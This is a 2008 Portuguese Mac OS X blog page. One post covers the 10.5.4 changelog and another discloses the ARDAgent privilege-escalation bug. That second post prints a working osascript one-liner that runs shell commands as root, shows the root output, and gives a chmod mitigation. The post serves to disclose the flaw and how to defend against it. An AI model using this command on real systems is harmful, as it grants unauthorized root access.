últimos posts

iSSH front-end ssh tunnel.

9 dezembro, 2008 Postado por: Eduardo Medeiros

O iSSH oferece uma maneira simples de iniciar uma conexão SSH Tunel, para aqueles que não sabem como utilizar o terminal ou simplesmente não precisa dele.

Continue lendo..

Categoria OSX, Segurança | Sem comentários »


Update 10.5.4 – Bug ARDAgent ainda existe.

1 julho, 2008 Postado por: Eduardo Medeiros

Apple liberou ontem o update 10.5.4 para Leopard.

Segue o changelog:

What’s included?

The 10.5.4 Update is recommended for all users running Mac OS X Leopard and includes general operating system fixes that enhance the stability, compatibility and security of your Mac.

General

  • Includes recent Apple security updates.
  • Resolves an issue with saving and reopening Adobe Creative Suite 3 files on a remote server.
  • Includes additional RAW image support for several cameras.
  • Addresses an issue that may result in a partially installed X11 application.
  • Improves L2TP VPN client reliability.

AirPort

  • Addresses AirPort reliability issues with 5GHz networks.
  • Addresses AirPort issues that may result in slower performance in Logic Studio or MainStage.

iCal

  • Improves overall iCal reliability for meeting requests, cancellation notices, delegation, and syncing with iPhone.
  • Resolves an issue that prevents deleting an iCal event without notifying the creator.
  • Addresses an issue in which events in all calendars affect availability.  A checkbox now enables information-only calendars to be transparent from free/busy lookups.
  • Resolves a UI issue preventing delegated calendars from showing up as a separate window.
  • Addresses an issue with copying and pasting attendees from one event to another.
  • Resolves an issue in which iCal may not delete events after a specified time interval, even when set to do so in iCal preferences.
  • Addresses an issue in which To Dos cannot be marked private.

Safari

  • Addresses a potential performance issue when loading secure web pages.
  • Resolves issues that may be encountered when accessing secure web pages with client certificates that reside on a smart card.

Spaces and Exposé

  • Addresses an issue in which switching from a space with a Finder window keeps the Finder as the active application instead of the application residing in the destination space.
  • Fixes an issue in which dragging an application from the list of application assignments in Spaces System Preferences does not assign the application to the desired space.
  • Resolves an Exposé issue that may result in only a subset of windows being shown.

Pois é.. corrigir o bug do Apple Remote Desktop (ARDAgent) nada?

Sinceramente… estou começando a ficar preocupado com a Apple.

Será que a qualidade vai cair ?

Abraços.

Categoria OSX, Segurança | Sem comentários »


Bug: Apple Script – Escalação de Privilégio.

19 junho, 2008 Postado por: Eduardo Medeiros

Encontrado BUG de escalação de privilégio no ARDAgent (Apple Remote Desktopt).

Com AppleScript é possivel executar comandos como usuário root.

Veja o exemplo abaixo:

# id

uid=501(eduardomedeiros) gid=20(staff) groups=20(staff),102(com.apple.access_ssh),98(_lpadmin),81(_appserveradm),103(com.apple.sharepoint.group.2),79(_appserverusr),101(com.apple.sharepoint.group.1),80(admin)

Obs: note que estou logado como usuário eduardomedeiros

# osascript -e 'tell app "ARDAgent" to do shell script "id"';

uid=0(root) gid=0(wheel) egid=20(staff) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),103(com.apple.sharepoint.group.2),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff)

Obs: Repare que a saída do comando id, exibe usuário root.

Solução provisória:

chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent

Obs: Ao Reparar as permissões pelo Disk Utility, a permissão do ARD voltará ao estado original.

Fonte: Slashdot.

Abraços.

Categoria OSX, Segurança | Sem comentários »


top 10 posts

últimos comentários


  • dotmac: Boa! não sabia dessa. Valeu!
  • Fabio: Nesses casos utilizo o unzip no Terminal: unzip -x nome_arquivo.zip
  • jean: obrigado
  • Francisco Medeiros: Ótima dica! ;)
  • ƒavarão: Software livre vai dominar o mundo ò.Ó…\\m/ Muito bom o seu blog!!!

Site feito por: Eduardo Medeiros, utilizando tecnologia Wordpress.
Melhor visualizado no Firefox/Safari/I.E 8.0
DOTMAC - 2005-2009 - Todos os direitos reservados.

rss Valid XHTML 1.0 Transitional